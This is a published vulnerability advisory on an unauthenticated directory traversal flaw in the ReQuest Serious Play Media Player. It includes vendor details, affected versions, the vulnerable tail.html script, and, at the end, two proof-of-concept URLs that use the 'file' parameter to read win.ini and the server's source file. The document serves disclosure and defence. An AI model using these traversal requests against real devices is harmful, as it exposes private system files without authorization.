ReQuest Serious Play Media Player 3.0 Directory Traversal File Disclosure Vulnerability

2020-10-18T00:00:00
ID ZSL-2020-5599
Type zeroscience
Reporter Gjoko Krstic
Modified 2020-10-18T00:00:00

Description

Title: ReQuest Serious Play Media Player 3.0 Directory Traversal File Disclosure Vulnerability
Advisory ID: ZSL-2020-5599
Type: Local/Remote
Impact: Exposure of System Information, Exposure of Sensitive Information
Risk: (4/5)
Release Date: 18.10.2020

Summary

With the MediaPlayer, ReQuest delivers video content and award-winning distributed music capabilities. Up to 4 MediaPlayers (15 when coupled with an approved NAS) can be connected through your home network to your ReQuest system, delivering HD video to your television in 1080p via HDMI outputs.

Description

The device suffers from an unauthenticated file disclosure vulnerability when input passed through the 'file' parameter in tail.html and file.html script is not properly verified before being used to read web log files. This can be exploited to disclose contents of files from local resources.

--------------------------------------------------------------------------------

` /tail.html:

function load_data()
{

var elem = $("#data");
$.ajax({url:"tail.html",
data:{
file:elem.attr("file"),
start:elem.attr("nextstart"),
tail:elem.attr("tail")?elem.attr("tail"):undefined,
max:elem.attr("max")?elem.attr("max"):undefined},
cache:false,
async:true,
success:show_data}
);
}

function main_start()
{

$("#data").attr({"nextstart": 0, "max": "", "tail": 10000, "update": 5, "file": "C:\\ReQuest\\mpweb\log\mpweb.log"});
window.setTimeout(load_data, 1);
}

function show_data(data, status, jqxhr)
{ var data = $("filedata", data);
var newdata = data.attr("data");
var start = data.attr("start");
var nextstart = data.attr("nextstart");
var elem = $("#data");
var at_end = ($(document).scrollTop()>=$(document).height()-window.innerHeight-20);
elem.attr({tail:"", start:start, nextstart:nextstart});
if (newdata.length)
elem.append(htmlspecialchars(newdata));
var delay = parseFloat(elem.attr("update"))*1000;
if (isNaN(delay))
delay = 5000;
if (at_end)
$("html,body").scrollTop($(document).height());
window.setTimeout(load_data, delay);
}

$(document).ready(main_start);
`
--------------------------------------------------------------------------------

Vendor

ReQuest Serious Play LLC - http://www.request.com

Affected Version

3.0.0
2.1.0.831
1.5.2.822
1.5.2.821
1.5.1.820

Tested On

ReQuestHTTP/0.1 httpserver/0.1

Vendor Status

[01.08.2020] Vulnerability discovered.
[16.08.2020] Vendor contacted.
[17.10.2020] No response from the vendor.
[18.10.2020] Public security advisory released.

PoC

requestmp_fd.txt

Credits

Vulnerability discovered by Gjoko Krstic - <gjoko@zeroscience.mk>

References

[1] <https://packetstormsecurity.com/files/159596>
[2] <https://cxsecurity.com/issue/WLB-2020100119>
[3] <https://exchange.xforce.ibmcloud.com/vulnerabilities/190030>
[4] <https://www.exploit-db.com/exploits/48949>

Changelog

[18.10.2020] - Initial release
[20.10.2020] - Added reference [1] and [2]
[26.10.2020] - Added reference [3] and [4]

Contact

Zero Science Lab

Web: <https://www.zeroscience.mk>
e-mail: lab@zeroscience.mk

                                        
                                            
ReQuest Serious Play Media Player 3.0 Directory Traversal File Disclosure Vulnerability


Vendor: ReQuest Serious Play LLC
Product web page: http://www.request.com
Affected version: 3.0.0
                  2.1.0.831
                  1.5.2.822
                  1.5.2.821
                  1.5.1.820

Summary: With the MediaPlayer, ReQuest delivers video content and award-winning
distributed music capabilities. Up to 4 MediaPlayers (15 when coupled with an
approved NAS) can be connected through your home network to your ReQuest system,
delivering HD video to your television in 1080p via HDMI outputs.

Desc: The device suffers from an unauthenticated file disclosure vulnerability
when input passed through the 'file' parameter in tail.html and file.html script
is not properly verified before being used to read web log files. This can be
exploited to disclose contents of files from local resources.

===============================================================================
/tail.html:
-----------

function load_data()
{

   var elem = $("#data");
   $.ajax({url:"tail.html", 
           data:{
                 file:elem.attr("file"),
                 start:elem.attr("nextstart"),
                 tail:elem.attr("tail")?elem.attr("tail"):undefined,
                 max:elem.attr("max")?elem.attr("max"):undefined},
                 cache:false,
                 async:true,
                 success:show_data}
                 );
}

function main_start()
{

   $("#data").attr({"nextstart": 0, "max": "", "tail": 10000, "update": 5, "file": "C:\\\\ReQuest\\\\mpweb\\log\\mpweb.log"});
   window.setTimeout(load_data, 1);
}

function show_data(data, status, jqxhr)
{
   var data = $("filedata", data);
   var newdata = data.attr("data");
   var start = data.attr("start");
   var nextstart = data.attr("nextstart");
   var elem = $("#data");
   var at_end = ($(document).scrollTop()&gt;=$(document).height()-window.innerHeight-20);
   elem.attr({tail:"", start:start, nextstart:nextstart});
   if (newdata.length)
      elem.append(htmlspecialchars(newdata));
   var delay = parseFloat(elem.attr("update"))*1000;
   if (isNaN(delay))
      delay = 5000;
   if (at_end)
      $("html,body").scrollTop($(document).height());
   window.setTimeout(load_data, delay);
}

$(document).ready(main_start);

===============================================================================

Tested on: ReQuestHTTP/0.1 httpserver/0.1


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2020-5599
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5599.php


01.08.2020

--


http://192.168.1.17:8001/tail.html?file=C:\\ReQuest\\mpweb\httpserver.py
http://192.168.1.17:8001/file.html?file=C:\windows\win.ini